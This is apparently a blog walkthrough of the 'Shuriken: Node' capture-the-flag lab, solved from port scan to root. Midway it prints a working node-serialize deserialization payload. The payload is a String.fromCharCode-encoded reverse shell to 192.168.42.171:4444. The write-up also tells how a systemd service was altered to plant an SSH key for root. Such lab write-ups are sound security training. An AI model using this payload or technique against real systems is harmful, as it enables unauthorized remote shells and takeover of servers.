systemweakness.com

SHURIKEN: NODE — Walkthrough

Ayush Shah
7–9 minutes

Ayush Shah

This is super fantastic box built by TheCyb3rW0lf. After the last breach, The Shuriken Company decided to move and rebuild its infrastructure. This time using different technology, and assuring us it’s gonna be secure. Will it be so? It’s up to you to prove otherwise.

Get Ayush Shah’s stories in your inbox

Join Medium for free to get updates from this writer.

As always I spun nmap first.

Press enter or click to view image in full size

From the above screenshot, we can take a note of ports open, 22 and 8080. 22 is SSH and 8080 is running a node application. Then I began with nmap default script scan.

Press enter or click to view image in full size

Then I moved to inspect the web page.

Press enter or click to view image in full size

The web page is static, it doesn’t have any links when clicking on that title of pages, but what really caught my eyes was , Welcome, Guest. I started questioning myself, how does it authenticates me as a Guest user. Firstly I took my eyes on cookies, the web page is defaulting Guest cookie whenever a user visits. The web page is using jwt to generate cookie.

Press enter or click to view image in full size

I tried to decode that cookie and I got this.

Press enter or click to view image in full size

I changed my username using base64 encoder.

Press enter or click to view image in full size

Press enter or click to view image in full size

We can set the values of username, so I thought it’s worth to try SSTI, I began to try basic injection payload like ${7*7}.

It seemed to be not working, the web application is sanitizing the bad characters. Then I assumed for a while it is decoding base64 cookie so I tried with payload only, I removed every thing except my basic payload.

I swapped my cookie and I got error.

Press enter or click to view image in full size

At first glance, you might think you are failing, but remember one thing error tells many things that can really help you. If you see the third line of the error, you will notice it’s serializing and unserializing the cookie object.

 at Object.exports.unserialize (/home/web/shuriken-node/node_modules/node-serialize/lib/serialize.js:62:16)

I was very happy and finally I went to google to find a way to exploit this serialization.

This POC is perfect. Remember to download this python script to generate payload.https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py

Press enter or click to view image in full size

And that’s not it, you have to put this payload in the object like this and convert it into base64.

{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,52,50,46,49,55,49,34,59,10,80,79,82,84,61,34,52,52,52,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))
}()"}

Press enter or click to view image in full size

Grab the base64 encoded string and replace the cookie with this and remember start up the nc listener on your localmachine.

Good, we have shell now and let’s begin with enumerating the entire system. So firstly, I went to check if there are backups file available.

Press enter or click to view image in full size

We can notice that there is passwd.bak and shadow.bak along with ssh-backup.zip. Unfortunately, passwd and shadow file are not readable by the user which we have shell. So, I copied that ssh-backup.zip into /tmp directory and unzipped it.

Press enter or click to view image in full size

We have private keys of serv-adm user, that is another user on the box. We have to get the passphrase key, which we can do using ss2john.py, let’s do it.

Press enter or click to view image in full size

Hurray! We have the passphrase, now we can login as serv-adm user with private keys.

Press enter or click to view image in full size

I checked if I can run anything as root, I typed sudo -l.

Press enter or click to view image in full size

We can start,stop and reload this service. Now, we have to find that on system.

Press enter or click to view image in full size

We can easily find out files using find command in linux.

Press enter or click to view image in full size

If we see all the timers on the system, we get the following.

Press enter or click to view image in full size

It’s triggering shuriken-job.service, we can locate it using find command. Unfortunately, I couldn’t get the shell through bash somehow, so I decided to generate id_rsa.pub in .ssh/ directory.

Then, I modified shuriken-job.service file, firstly, it will make dir .ssh/ in /root if it doesn’t exists, while if it does then it will download id_rsa.pub from my webserver and output it into .ssh/authorized_keys. I had already setup my python3 webserver.

Press enter or click to view image in full size

After doing all these stuffs, I stopped, reload and started that service again.

Press enter or click to view image in full size

Actually, when I ran start command it hitted my webserver.

Press enter or click to view image in full size

At that point, I assumed that it had been downloaded into /root/.ssh/, so I tried to ssh login and successfully we rooted the box.

Press enter or click to view image in full size

Done! This box was really awesome and headache, I spend many hours to understand the web technology, don’t forget the hint: see what technology does the web uses and how does it process the user input.

Thank you for reading.

Happy Hacking!